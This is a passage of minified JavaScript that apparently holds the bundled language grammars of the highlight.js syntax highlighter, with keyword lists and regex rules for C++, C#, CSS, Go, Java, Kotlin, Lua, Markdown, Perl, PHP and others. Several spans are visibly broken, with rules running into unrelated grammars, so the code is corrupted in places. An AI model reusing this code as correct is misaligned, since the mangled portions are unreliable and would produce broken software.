else",end:/;/},],keywords:g,contains:b.concat([{begin:/\(/,end:/\)/,keywords:g,contains:b.concat(["self"]),relevance:0},]),relevance:0},p={className:"function",begin:"("+i+"[\\*&\\s]+)+"+d,returnBegin:!0,end:/[{;=]/,excludeEnd:!0,keywords:g,illegal:/[^\w\s\*&:<>.]/,contains:[{begin:"decltype\\(auto\\)",keywords:g,relevance:0},{begin:d,returnBegin:!0,contains:[c],relevance:0},{begin:/::/,relevance:0},{begin:/:/,endsWithParent:!0,contains:[s,l]},{relevance:0,match:/,/},{className:"params",begin:/\(/,end:/\)/,keywords:g,relevance:0,contains:[t,e.C_BLOCK_COMMENT_MODE,s,l,r,{begin:/\(/,end:/\)/,keywords:g,relevance:0,contains:["self",t,e.C_BLOCK_COMMENT_MODE,s,l,r]},]},r,t,e.C_BLOCK_COMMENT_MODE,o,]};return{name:"C++",aliases:["cc","c++","h++","hpp","hh","hxx","cxx"],keywords:g,illegal:"",keywords:g,contains:["self",r]},{begin:e.IDENT_RE+"::",keywords:g},{match:[/\b(?:enum(?:\s+(?:class|struct))?|class|struct|union)/,/\s+/,/\w+/,],className:{1:"keyword",3:"title.class"}},])}},grmr_csharp(e){let 
n={keyword:["abstract","as","base","break","case","catch","class","const","continue","do","else","event","explicit","extern","finally","fixed","for","foreach","goto","if","implicit","in","interface","internal","is","lock","namespace","new","operator","out","override","params","private","protected","public","readonly","record","ref","return","scoped","sealed","sizeof","stackalloc","static","struct","switch","this","throw","try","typeof","unchecked","unsafe","using","virtual","void","volatile","while",].concat(["add","alias","and","ascending","async","await","by","descending","equals","from","get","global","group","init","into","join","let","nameof","not","notnull","on","or","orderby","partial","remove","select","set","unmanaged","value|0","var","when","where","with","yield",]),built_in:["bool","byte","char","decimal","delegate","double","dynamic","enum","float","int","long","nint","nuint","object","sbyte","short","string","ulong","uint","ushort",],literal:["default","false","null","true"]},t=e.inherit(e.TITLE_MODE,{begin:"[a-zA-Z](\\.?\\w)*"}),a={className:"number",variants:[{begin:"\\b(0b[01']+)"},{begin:"(-?)\\b([\\d']+(\\.[\\d']*)?|\\.[\\d']+)(u|U|l|L|ul|UL|f|F|b|B)"},{begin:"(-?)(\\b0[xX][a-fA-F0-9']+|(\\b[\\d']+(\\.[\\d']*)?|\\.[\\d']+)([eE][-+]?[\\d']+)?)"},],relevance:0},i={className:"string",begin:'@"',end:'"',contains:[{begin:'""'}]},r=e.inherit(i,{illegal:/\n/}),s={className:"subst",begin:/\{/,end:/\}/,keywords:n},l=e.inherit(s,{illegal:/\n/}),o={className:"string",begin:/\$"/,end:'"',illegal:/\n/,contains:[{begin:/\{\{/},{begin:/\}\}/},e.BACKSLASH_ESCAPE,l,]},c={className:"string",begin:/\$@"/,end:'"',contains:[{begin:/\{\{/},{begin:/\}\}/},{begin:'""'},s,]},d=e.inherit(c,{illegal:/\n/,contains:[{begin:/\{\{/},{begin:/\}\}/},{begin:'""'},l]});s.contains=[c,o,i,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,a,e.C_BLOCK_COMMENT_MODE,],l.contains=[d,o,r,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,a,e.inherit(e.C_BLOCK_COMMENT_MODE,{illegal:/\n/}),];let 
g={variants:[c,o,i,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE]},u={begin:"<",end:">",contains:[{beginKeywords:"in out"},t]},b=e.IDENT_RE+"(<"+e.IDENT_RE+"(\\s*,\\s*"+e.IDENT_RE+")*>)?(\\[\\])?",m={begin:"@"+e.IDENT_RE,relevance:0};return{name:"C#",aliases:["cs","c#"],keywords:n,illegal:/::/,contains:[e.COMMENT("///","$",{returnBegin:!0,contains:[{className:"doctag",variants:[{begin:"///",relevance:0},{begin:""},{begin:""},]},]}),e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,{className:"meta",begin:"#",end:"$",keywords:{keyword:"if else elif endif define undef warning error line region endregion pragma checksum"}},g,a,{beginKeywords:"class interface",relevance:0,end:/[{;=]/,illegal:/[^\s:,]/,contains:[{beginKeywords:"where class"},t,u,e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,]},{beginKeywords:"namespace",relevance:0,end:/[{;=]/,illegal:/[^\s:]/,contains:[t,e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE]},{beginKeywords:"record",relevance:0,end:/[{;=]/,illegal:/[^\s:]/,contains:[t,u,e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE]},{className:"meta",begin:"^\\s*\\[(?=[\\w])",excludeBegin:!0,end:"\\]",excludeEnd:!0,contains:[{className:"string",begin:/"/,end:/"/},]},{beginKeywords:"new return throw await else",relevance:0},{className:"function",begin:"("+b+"\\s+)+"+e.IDENT_RE+"\\s*(<[^=]+>\\s*)?\\(",returnBegin:!0,end:/\s*[{;=]/,excludeEnd:!0,keywords:n,contains:[{beginKeywords:"public private protected static internal protected abstract async extern override unsafe virtual new sealed partial",relevance:0},{begin:e.IDENT_RE+"\\s*(<[^=]+>\\s*)?\\(",returnBegin:!0,contains:[e.TITLE_MODE,u],relevance:0},{match:/\(\)/},{className:"params",begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,keywords:n,relevance:0,contains:[g,a,e.C_BLOCK_COMMENT_MODE]},e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,]},m,]}},grmr_css(e){let n=e.regex,t=X(e),a=[e.APOS_STRING_MODE,e.QUOTE_STRING_MODE];return{name:"CSS",case_insensitive:!0,illegal:/[=|'\$]/,keywords:{keyframePosition:"from 
to"},classNameAliases:{keyframePosition:"selector-tag"},contains:[t.BLOCK_COMMENT,{begin:/-(webkit|moz|ms|o)-(?=[a-z])/},t.CSS_NUMBER_MODE,{className:"selector-id",begin:/#[A-Za-z0-9_-]+/,relevance:0},{className:"selector-class",begin:"\\.[a-zA-Z-][a-zA-Z0-9_-]*",relevance:0},t.ATTRIBUTE_SELECTOR_MODE,{className:"selector-pseudo",variants:[{begin:":("+Y.join("|")+")"},{begin:":(:)?("+ee.join("|")+")"},]},t.CSS_VARIABLE,{className:"attribute",begin:"\\b("+en.join("|")+")\\b"},{begin:/:/,end:/[;}{]/,contains:[t.BLOCK_COMMENT,t.HEXCOLOR,t.IMPORTANT,t.CSS_NUMBER_MODE,...a,{begin:/(url|data-uri)\(/,end:/\)/,relevance:0,keywords:{built_in:"url data-uri"},contains:[...a,{className:"string",begin:/[^)]/,endsWithParent:!0,excludeEnd:!0},]},t.FUNCTION_DISPATCH,]},{begin:n.lookahead(/@/),end:"[{;]",relevance:0,illegal:/:/,contains:[{className:"keyword",begin:/@-?\w[\w]*(-\w+)*/},{begin:/\s/,endsWithParent:!0,excludeEnd:!0,relevance:0,keywords:{$pattern:/[a-z-]+/,keyword:"and or not only",attribute:J.join(" ")},contains:[{begin:/[a-z-]+(?=:)/,className:"attribute"},...a,t.CSS_NUMBER_MODE,]},]},{className:"selector-tag",begin:"\\b("+V.join("|")+")\\b"},]}},grmr_diff(e){let n=e.regex;return{name:"Diff",aliases:["patch"],contains:[{className:"meta",relevance:10,match:n.either(/^@@ +-\d+,\d+ +\+\d+,\d+ +@@/,/^\*\*\* +\d+,\d+ +\*\*\*\*$/,/^--- +\d+,\d+ +----$/)},{className:"comment",variants:[{begin:n.either(/Index: /,/^index/,/={3,}/,/^-{3}/,/^\*{3} /,/^\+{3}/,/^diff --git/),end:/$/},{match:/^\*{15}$/},]},{className:"addition",begin:/^\+/,end:/$/},{className:"deletion",begin:/^-/,end:/$/},{className:"addition",begin:/^!/,end:/$/},]}},grmr_go(e){let 
n={keyword:["break","case","chan","const","continue","default","defer","else","fallthrough","for","func","go","goto","if","import","interface","map","package","range","return","select","struct","switch","type","var",],type:["bool","byte","complex64","complex128","error","float32","float64","int8","int16","int32","int64","string","uint8","uint16","uint32","uint64","int","uint","uintptr","rune",],literal:["true","false","iota","nil"],built_in:["append","cap","close","complex","copy","imag","len","make","new","panic","print","println","real","recover","delete",]};return{name:"Go",aliases:["golang"],keywords:n,illegal:"e(n,t,a-1))}("(?:<"+t+"~~~(?:\\s*,\\s*"+t+"~~~)*>)?",/~~~/g,2),i={keyword:["synchronized","abstract","private","var","static","if","const ","for","while","strictfp","finally","protected","import","native","final","void","enum","else","break","transient","catch","instanceof","volatile","case","assert","package","default","public","try","switch","continue","throws","protected","public","private","module","requires","exports","do","sealed","yield","permits",],literal:["false","true","null"],type:["char","boolean","long","float","int","byte","short","double",],built_in:["super","this"]},r={className:"meta",begin:"@"+t,contains:[{begin:/\(/,end:/\)/,contains:["self"]},]},s={className:"params",begin:/\(/,end:/\)/,keywords:i,relevance:0,contains:[e.C_BLOCK_COMMENT_MODE],endsParent:!0};return{name:"Java",aliases:["jsp"],keywords:i,illegal:/<\/|#/,contains:[e.COMMENT("/\\*\\*","\\*/",{relevance:0,contains:[{begin:/\w+@/,relevance:0},{className:"doctag",begin:"@[A-Za-z]+"},]}),{begin:/import 
java\.[a-z]+\./,keywords:"import",relevance:2},e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,{begin:/"""/,end:/"""/,className:"string",contains:[e.BACKSLASH_ESCAPE]},e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,{match:[/\b(?:class|interface|enum|extends|implements|new)/,/\s+/,t,],className:{1:"keyword",3:"title.class"}},{match:/non-sealed/,scope:"keyword"},{begin:[n.concat(/(?!else)/,t),/\s+/,t,/\s+/,/=(?!=)/],className:{1:"type",3:"variable",5:"operator"}},{begin:[/record/,/\s+/,t],className:{1:"keyword",3:"title.class"},contains:[s,e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE]},{beginKeywords:"new throw return else",relevance:0},{begin:["(?:"+a+"\\s+)",e.UNDERSCORE_IDENT_RE,/\s*(?=\()/],className:{2:"title.function"},keywords:i,contains:[{className:"params",begin:/\(/,end:/\)/,keywords:i,relevance:0,contains:[r,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,er,e.C_BLOCK_COMMENT_MODE,]},e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,]},er,r,]}},grmr_javascript:em,grmr_json(e){let n=["true","false","null"],t={scope:"literal",beginKeywords:n.join(" ")};return{name:"JSON",keywords:{literal:n},contains:[{className:"attr",begin:/"(\\.|[^\\"\r\n])*"(?=\s*:)/,relevance:1.01},{match:/[{}[\],:]/,className:"punctuation",relevance:0},e.QUOTE_STRING_MODE,t,e.C_NUMBER_MODE,e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,],illegal:"\\S"}},grmr_kotlin(e){let n={keyword:"abstract as val var vararg get set class object open private protected public noinline crossinline dynamic final enum if else do while for when throw try catch finally import package is in fun override companion reified inline lateinit init interface annotation data sealed internal infix operator out by constructor super tailrec where const inner suspend typealias external expect actual",built_in:"Byte Short Char Int Long Boolean Float Double Void Unit Nothing",literal:"true false 
null"},t={className:"symbol",begin:e.UNDERSCORE_IDENT_RE+"@"},a={className:"subst",begin:/\$\{/,end:/\}/,contains:[e.C_NUMBER_MODE]},i={className:"variable",begin:"\\$"+e.UNDERSCORE_IDENT_RE},r={className:"string",variants:[{begin:'"""',end:'"""(?=[^"])',contains:[i,a]},{begin:"'",end:"'",illegal:/\n/,contains:[e.BACKSLASH_ESCAPE]},{begin:'"',end:'"',illegal:/\n/,contains:[e.BACKSLASH_ESCAPE,i,a]},]};a.contains.push(r);let s={className:"meta",begin:"@(?:file|property|field|get|set|receiver|param|setparam|delegate)\\s*:(?:\\s*"+e.UNDERSCORE_IDENT_RE+")?"},l={className:"meta",begin:"@"+e.UNDERSCORE_IDENT_RE,contains:[{begin:/\(/,end:/\)/,contains:[e.inherit(r,{className:"string"}),"self"]},]},o=e.COMMENT("/\\*","\\*/",{contains:[e.C_BLOCK_COMMENT_MODE]}),c={variants:[{className:"type",begin:e.UNDERSCORE_IDENT_RE},{begin:/\(/,end:/\)/,contains:[]},]},d=c;return d.variants[1].contains=[c],c.variants[1].contains=[d],{name:"Kotlin",aliases:["kt","kts"],keywords:n,contains:[e.COMMENT("/\\*\\*","\\*/",{relevance:0,contains:[{className:"doctag",begin:"@[A-Za-z]+"}]}),e.C_LINE_COMMENT_MODE,o,{className:"keyword",begin:/\b(break|continue|return|this)\b/,starts:{contains:[{className:"symbol",begin:/@\w+/}]}},t,s,l,{className:"function",beginKeywords:"fun",end:"[(]|$",returnBegin:!0,excludeEnd:!0,keywords:n,relevance:5,contains:[{begin:e.UNDERSCORE_IDENT_RE+"\\s*\\(",returnBegin:!0,relevance:0,contains:[e.UNDERSCORE_TITLE_MODE]},{className:"type",begin:/</,end:/>/,keywords:"reified",relevance:0},{className:"params",begin:/\(/,end:/\)/,endsParent:!0,keywords:n,relevance:0,contains:[{begin:/:/,end:/[=,\/]/,endsWithParent:!0,contains:[c,e.C_LINE_COMMENT_MODE,o],relevance:0},e.C_LINE_COMMENT_MODE,o,s,l,r,e.C_NUMBER_MODE,]},o,]},{begin:[/class|interface|trait/,/\s+/,e.UNDERSCORE_IDENT_RE],beginScope:{3:"title.class"},keywords:"class interface trait",end:/[:\{(]|$/,excludeEnd:!0,illegal:"extends implements",contains:[{beginKeywords:"public protected internal private constructor"},e.UNDERSCORE_TITLE_MODE,{className:"type",begin:/</,end:/>/,excludeBegin:!0,excludeEnd:!0,relevance:0},{className:"type",begin:/[,:]\s*/,end:/[<\(,){\s]|$/,excludeBegin:!0,returnEnd:!0},s,l,]},r,{className:"meta",begin:"^#!/usr/bin/env",end:"$",illegal:"\n"},er,]}},grmr_less(e){let n=X(e),t="([\\w-]+|@\\{[\\w-]+\\})",a=[],i=[],r=e=>({className:"string",begin:"~?"+e+".*?"+e}),s=(e,n,t)=>({className:e,begin:n,relevance:t}),l={$pattern:/[a-z-]+/,keyword:"and or not only",attribute:J.join(" ")};i.push(e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,r("'"),r('"'),n.CSS_NUMBER_MODE,{begin:"(url|data-uri)\\(",starts:{className:"string",end:"[\\)\\n]",excludeEnd:!0}},n.HEXCOLOR,{begin:"\\(",end:"\\)",contains:i,keywords:l,relevance:0},s("variable","@@?[\\w-]+",10),s("variable","@\\{[\\w-]+\\}"),s("built_in","~?`[^`]*?`"),{className:"attribute",begin:"[\\w-]+\\s*:",end:":",returnBegin:!0,excludeEnd:!0},n.IMPORTANT,{beginKeywords:"and not"},n.FUNCTION_DISPATCH);let o=i.concat({begin:/\{/,end:/\}/,contains:a}),c={beginKeywords:"when",endsWithParent:!0,contains:[{beginKeywords:"and 
not"}].concat(i)},d={begin:t+"\\s*:",returnBegin:!0,end:/[;}]/,relevance:0,contains:[{begin:/-(webkit|moz|ms|o)-/},n.CSS_VARIABLE,{className:"attribute",begin:"\\b("+en.join("|")+")\\b",end:/(?=:)/,starts:{endsWithParent:!0,illegal:"[<=$]",relevance:0,contains:i}},]},g={variants:[{begin:"[\\.#:&\\[>]",end:"[;{}]"},{begin:t,end:/\{/},],returnBegin:!0,returnEnd:!0,illegal:"[<='$\"]",relevance:0,contains:[e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,c,s("keyword","all\\b"),s("variable","@\\{[\\w-]+\\}"),{begin:"\\b("+V.join("|")+")\\b",className:"selector-tag"},n.CSS_NUMBER_MODE,s("selector-tag",t,0),s("selector-id","#"+t),s("selector-class","\\."+t,0),s("selector-tag","&",0),n.ATTRIBUTE_SELECTOR_MODE,{className:"selector-pseudo",begin:":("+Y.join("|")+")"},{className:"selector-pseudo",begin:":(:)?("+ee.join("|")+")"},{begin:/\(/,end:/\)/,relevance:0,contains:o},{begin:"!important"},n.FUNCTION_DISPATCH,]},u={begin:`[\\w-]+:(:)?(${et.join("|")})`,returnBegin:!0,contains:[g]};return a.push(e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,{className:"keyword",begin:"@(import|media|charset|font-face|(-[a-z]+-)?keyframes|supports|document|namespace|page|viewport|host)\\b",starts:{end:"[;{}]",keywords:l,returnEnd:!0,contains:i,relevance:0}},{className:"variable",variants:[{begin:"@[\\w-]+\\s*:",relevance:15},{begin:"@[\\w-]+"},],starts:{end:"[;}]",returnEnd:!0,contains:o}},u,d,g,c,n.FUNCTION_DISPATCH),{name:"Less",case_insensitive:!0,illegal:"[=>'/<($\"]",contains:a}},grmr_lua(e){let n="\\[=*\\[",t="\\]=*\\]",a={begin:n,end:t,contains:["self"]},i=[e.COMMENT("--(?!\\[=*\\[)","$"),e.COMMENT("--\\[=*\\[",t,{contains:[a],relevance:10}),];return{name:"Lua",keywords:{$pattern:e.UNDERSCORE_IDENT_RE,literal:"true false nil",keyword:"and break do else elseif end for goto if in local not or repeat return then until while",built_in:"_G _ENV _VERSION __index __newindex __mode __call __metatable __tostring __len __gc __add __sub __mul __div __mod __pow __concat __unm __eq __lt __le assert 
collectgarbage dofile error getfenv getmetatable ipairs load loadfile loadstring module next pairs pcall print rawequal rawget rawset require select setfenv setmetatable tonumber tostring type unpack xpcall arg self coroutine resume yield status wrap create running debug getupvalue debug sethook getmetatable gethook setmetatable setlocal traceback setfenv getinfo setupvalue getlocal getregistry getfenv io lines write close flush open output type read stderr stdin input stdout popen tmpfile math log max acos huge ldexp pi cos tanh pow deg tan cosh sinh random randomseed frexp ceil floor rad abs sqrt modf asin min mod fmod log10 atan2 exp sin atan os exit setlocale date getenv difftime remove time clock tmpname rename execute package preload loadlib loaded loaders cpath config path seeall string sub upper len gfind rep find match char dump gmatch reverse byte format gsub lower table setn insert getn foreachi maxn foreach concat sort remove"},contains:i.concat([{className:"function",beginKeywords:"function",end:"\\)",contains:[e.inherit(e.TITLE_MODE,{begin:"([_a-zA-Z]\\w*\\.)*([_a-zA-Z]\\w*:)?[_a-zA-Z]\\w*"}),{className:"params",begin:"\\(",endsWithParent:!0,contains:i},].concat(i)},e.C_NUMBER_MODE,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,{className:"string",begin:n,end:t,contains:[a],relevance:5},])}},grmr_makefile(e){let n={className:"variable",variants:[{begin:"\\$\\("+e.UNDERSCORE_IDENT_RE+"\\)",contains:[e.BACKSLASH_ESCAPE]},{begin:/\$[@%`]+/},]},]},]};return{name:"HTML, 
XML",aliases:["html","xhtml","rss","atom","xjb","xsd","xsl","plist","wsf","svg",],case_insensitive:!0,unicodeRegex:!0,contains:[{className:"meta",begin://,relevance:10,contains:[i,l,s,r,{begin:/\[/,end:/\]/,contains:[{className:"meta",begin://,contains:[i,r,l,s]},]},]},e.COMMENT(//,{relevance:10}),{begin://,relevance:10},a,{className:"meta",end:/\?>/,variants:[{begin:/<\?xml/,relevance:10,contains:[l]},{begin:/<\?[a-z][a-z0-9]+/},]},{className:"tag",begin:/)/,end:/>/,keywords:{name:"style"},contains:[o],starts:{end:/<\/style>/,returnEnd:!0,subLanguage:["css","xml"]}},{className:"tag",begin:/)/,end:/>/,keywords:{name:"script"},contains:[o],starts:{end:/<\/script>/,returnEnd:!0,subLanguage:["javascript","handlebars","xml"]}},{className:"tag",begin:/<>|<\/>/},{className:"tag",begin:n.concat(//,/>/,/\s/)))),end:/\/?>/,contains:[{className:"name",begin:t,relevance:0,starts:o},]},{className:"tag",begin:n.concat(/<\//,n.lookahead(n.concat(t,/>/))),contains:[{className:"name",begin:t,relevance:0},{begin:/>/,relevance:0,endsParent:!0},]},]}},grmr_markdown(e){let 
n={begin:/<\/?[A-Za-z_]/,end:">",subLanguage:"xml",relevance:0},t={variants:[{begin:/\[.+?\]\[.*?\]/,relevance:0},{begin:/\[.+?\]\(((data|javascript|mailto):|(?:http|ftp)s?:\/\/).*?\)/,relevance:2},{begin:e.regex.concat(/\[.+?\]\(/,/[A-Za-z][A-Za-z0-9+.-]*/,/:\/\/.*?\)/),relevance:2},{begin:/\[.+?\]\([./?&#].*?\)/,relevance:1},{begin:/\[.*?\]\(.*?\)/,relevance:0},],returnBegin:!0,contains:[{match:/\[(?=\])/},{className:"string",relevance:0,begin:"\\[",end:"\\]",excludeBegin:!0,returnEnd:!0},{className:"link",relevance:0,begin:"\\]\\(",end:"\\)",excludeBegin:!0,excludeEnd:!0},{className:"symbol",relevance:0,begin:"\\]\\[",end:"\\]",excludeBegin:!0,excludeEnd:!0},]},a={className:"strong",contains:[],variants:[{begin:/_{2}(?!\s)/,end:/_{2}/},{begin:/\*{2}(?!\s)/,end:/\*{2}/},]},i={className:"emphasis",contains:[],variants:[{begin:/\*(?![*\s])/,end:/\*/},{begin:/_(?![_\s])/,end:/_/,relevance:0},]},r=e.inherit(a,{contains:[]}),s=e.inherit(i,{contains:[]});a.contains.push(s),i.contains.push(r);let l=[n,t];return[a,i,r,s].forEach(e=>{e.contains=e.contains.concat(l)}),{name:"Markdown",aliases:["md","mkdown","mkd"],contains:[{className:"section",variants:[{begin:"^#{1,6}",end:"$",contains:l=l.concat(a,i)},{begin:"(?=^.+?\\n[=-]{2,}$)",contains:[{begin:"^[=-]*$"},{begin:"^",end:"\\n",contains:l},]},]},n,{className:"bullet",begin:"^[ ]*([*+-]|(\\d+\\.))(?=\\s+)",end:"\\s+",excludeEnd:!0},a,i,{className:"quote",begin:"^>\\s+",contains:l,end:"$"},{className:"code",variants:[{begin:"(`{3,})[^`](.|\\n)*?\\1`*[ ]*"},{begin:"(~{3,})[^~](.|\\n)*?\\1~*[ ]*"},{begin:"```",end:"```+[ ]*$"},{begin:"~~~",end:"~~~+[ ]*$"},{begin:"`.+?`"},{begin:"(?=^( {4}|\\t))",contains:[{begin:"^( {4}|\\t)",end:"(\\n)$"}],relevance:0},]},{begin:"^[-\\*]{3,}",end:"$"},t,{begin:/^\[[^\n]+\]:/,returnBegin:!0,contains:[{className:"symbol",begin:/\[/,end:/\]/,excludeBegin:!0,excludeEnd:!0},{className:"link",begin:/:\s*/,end:/$/,excludeBegin:!0},]},]}},grmr_objectivec(e){let 
n=/[a-zA-Z@][a-zA-Z0-9_]*/,t={$pattern:n,keyword:["@interface","@class","@protocol","@implementation"]};return{name:"Objective-C",aliases:["mm","objc","obj-c","obj-c++","objective-c++"],keywords:{"variable.language":["this","super"],$pattern:n,keyword:["while","export","sizeof","typedef","const","struct","for","union","volatile","static","mutable","if","do","return","goto","enum","else","break","extern","asm","case","default","register","explicit","typename","switch","continue","inline","readonly","assign","readwrite","self","@synchronized","id","typeof","nonatomic","IBOutlet","IBAction","strong","weak","copy","in","out","inout","bycopy","byref","oneway","__strong","__weak","__block","__autoreleasing","@private","@protected","@public","@try","@property","@end","@throw","@catch","@finally","@autoreleasepool","@synthesize","@dynamic","@selector","@optional","@required","@encode","@package","@import","@defs","@compatibility_alias","__bridge","__bridge_transfer","__bridge_retained","__bridge_retain","__covariant","__contravariant","__kindof","_Nonnull","_Nullable","_Null_unspecified","__FUNCTION__","__PRETTY_FUNCTION__","__attribute__","getter","setter","retain","unsafe_unretained","nonnull","nullable","null_unspecified","null_resettable","class","instancetype","NS_DESIGNATED_INITIALIZER","NS_UNAVAILABLE","NS_REQUIRES_SUPER","NS_RETURNS_INNER_POINTER","NS_INLINE","NS_AVAILABLE","NS_DEPRECATED","NS_ENUM","NS_OPTIONS","NS_SWIFT_UNAVAILABLE","NS_ASSUME_NONNULL_BEGIN","NS_ASSUME_NONNULL_END","NS_REFINED_FOR_SWIFT","NS_SWIFT_NAME","NS_SWIFT_NOTHROW","NS_DURING","NS_HANDLER","NS_ENDHANDLER","NS_VALUERETURN","NS_VOIDRETURN",],literal:["false","true","FALSE","TRUE","nil","YES","NO","NULL",],built_in:["dispatch_once_t","dispatch_queue_t","dispatch_sync","dispatch_async","dispatch_once",],type:["int","float","char","unsigned","signed","short","long","double","wchar_t","unichar","void","bool","BOOL","id|0","_Bool",]},illegal:"/,end:/$/,illegal:"\\n"},e.C_LINE_COMMENT_MODE,e.C_BLOC
K_COMMENT_MODE,]},{className:"class",begin:"("+t.keyword.join("|")+")\\b",end:/(\{|$)/,excludeEnd:!0,keywords:t,contains:[e.UNDERSCORE_TITLE_MODE]},{begin:"\\."+e.UNDERSCORE_IDENT_RE,relevance:0},]}},grmr_perl(e){let n=e.regex,t=/[dualxmsipngr]{0,12}/,a={$pattern:/[\w.]+/,keyword:"abs accept alarm and atan2 bind binmode bless break caller chdir chmod chomp chop chown chr chroot close closedir connect continue cos crypt dbmclose dbmopen defined delete die do dump each else elsif endgrent endhostent endnetent endprotoent endpwent endservent eof eval exec exists exit exp fcntl fileno flock for foreach fork format formline getc getgrent getgrgid getgrnam gethostbyaddr gethostbyname gethostent getlogin getnetbyaddr getnetbyname getnetent getpeername getpgrp getpriority getprotobyname getprotobynumber getprotoent getpwent getpwnam getpwuid getservbyname getservbyport getservent getsockname getsockopt given glob gmtime goto grep gt hex if index int ioctl join keys kill last lc lcfirst length link listen local localtime log lstat lt ma map mkdir msgctl msgget msgrcv msgsnd my ne next no not oct open opendir or ord our pack package pipe pop pos print printf prototype push q|0 qq quotemeta qw qx rand read readdir readline readlink readpipe recv redo ref rename require reset return reverse rewinddir rindex rmdir say scalar seek seekdir select semctl semget semop send setgrent sethostent setnetent setpgrp setpriority setprotoent setpwent setservent setsockopt shift shmctl shmget shmread shmwrite shutdown sin sleep socket socketpair sort splice split sprintf sqrt srand stat state study sub substr symlink syscall sysopen sysread sysseek system syswrite tell telldir tie tied time times tr truncate uc ucfirst umask undef unless unlink unpack unshift untie until use utime values vec wait waitpid wantarray warn when while write x|0 xor 
y|0"},i={className:"subst",begin:"[$@]\\{",end:"\\}",keywords:a},r={begin:/->\{/,end:/\}/},s={variants:[{begin:/\$\d/},{begin:n.concat(/[$%@](\^\w\b|#\w+(::\w+)*|\{\w+\}|\w+(::\w*)*)/,"(?![A-Za-z])(?![@$%])")},{begin:/[$%@][^\s\w{]/,relevance:0},]},l=[e.BACKSLASH_ESCAPE,i,s],o=[/!/,/\//,/\|/,/\?/,/'/,/"/,/#/],c=(e,a,i="\\1")=>{let r="\\1"===i?i:n.concat(i,a);return n.concat(n.concat("(?:",e,")"),a,/(?:\\.|[^\\\/])*?/,r,/(?:\\.|[^\\\/])*?/,i,t)},d=(e,a,i)=>n.concat(n.concat("(?:",e,")"),a,/(?:\\.|[^\\\/])*?/,i,t),g=[s,e.HASH_COMMENT_MODE,e.COMMENT(/^=\w/,/=cut/,{endsWithParent:!0}),r,{className:"string",contains:l,variants:[{begin:"q[qwxr]?\\s*\\(",end:"\\)",relevance:5},{begin:"q[qwxr]?\\s*\\[",end:"\\]",relevance:5},{begin:"q[qwxr]?\\s*\\{",end:"\\}",relevance:5},{begin:"q[qwxr]?\\s*\\|",end:"\\|",relevance:5},{begin:"q[qwxr]?\\s*<",end:">",relevance:5},{begin:"qw\\s+q",end:"q",relevance:5},{begin:"'",end:"'",contains:[e.BACKSLASH_ESCAPE]},{begin:'"',end:'"'},{begin:"`",end:"`",contains:[e.BACKSLASH_ESCAPE]},{begin:/\{\w+\}/,relevance:0},{begin:"-?\\w+\\s*=>",relevance:0},]},{className:"number",begin:"(\\b0[0-7_]+)|(\\b0x[0-9a-fA-F_]+)|(\\b[1-9][0-9_]*(\\.[0-9_]+)?)|[0_]\\b",relevance:0},{begin:"(\\/\\/|"+e.RE_STARTERS_RE+"|\\b(split|return|print|reverse|grep)\\b)\\s*",keywords:"split return print reverse 
grep",relevance:0,contains:[e.HASH_COMMENT_MODE,{className:"regexp",variants:[{begin:c("s|tr|y",n.either(...o,{capture:!0}))},{begin:c("s|tr|y","\\(","\\)")},{begin:c("s|tr|y","\\[","\\]")},{begin:c("s|tr|y","\\{","\\}")},],relevance:2},{className:"regexp",variants:[{begin:/(m|qr)\/\//,relevance:0},{begin:d("(?:m|qr)?",/\//,/\//)},{begin:d("m|qr",n.either(...o,{capture:!0}),/\1/)},{begin:d("m|qr",/\(/,/\)/)},{begin:d("m|qr",/\[/,/\]/)},{begin:d("m|qr",/\{/,/\}/)},]},]},{className:"function",beginKeywords:"sub",end:"(\\s*\\(.*?\\))?[;{]",excludeEnd:!0,relevance:5,contains:[e.TITLE_MODE]},{begin:"-\\w\\b",relevance:0},{begin:"^__DATA__$",end:"^__END__$",subLanguage:"mojolicious",contains:[{begin:"^@@.*",end:"$",className:"comment"}]},];return i.contains=g,r.contains=g,{name:"Perl",aliases:["pl","pm"],keywords:a,contains:g}},grmr_php(e){let n=e.regex,t=/(?![A-Za-z0-9])(?![$])/,a=n.concat(/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/,t),i=n.concat(/(\\?[A-Z][a-z0-9_\x7f-\xff]+|\\?[A-Z]+(?=[A-Z][a-z0-9_\x7f-\xff])){1,}/,t),r={scope:"variable",match:"\\$+"+a},s={scope:"subst",variants:[{begin:/\$\w+/},{begin:/\{\$/,end:/\}/},]},l=e.inherit(e.APOS_STRING_MODE,{illegal:null}),o="[ \n]",c={scope:"string",variants:[e.inherit(e.QUOTE_STRING_MODE,{illegal:null,contains:e.QUOTE_STRING_MODE.contains.concat(s)}),l,e.END_SAME_AS_BEGIN({begin:/<<<[ \t]*(\w+)\n/,end:/[ 
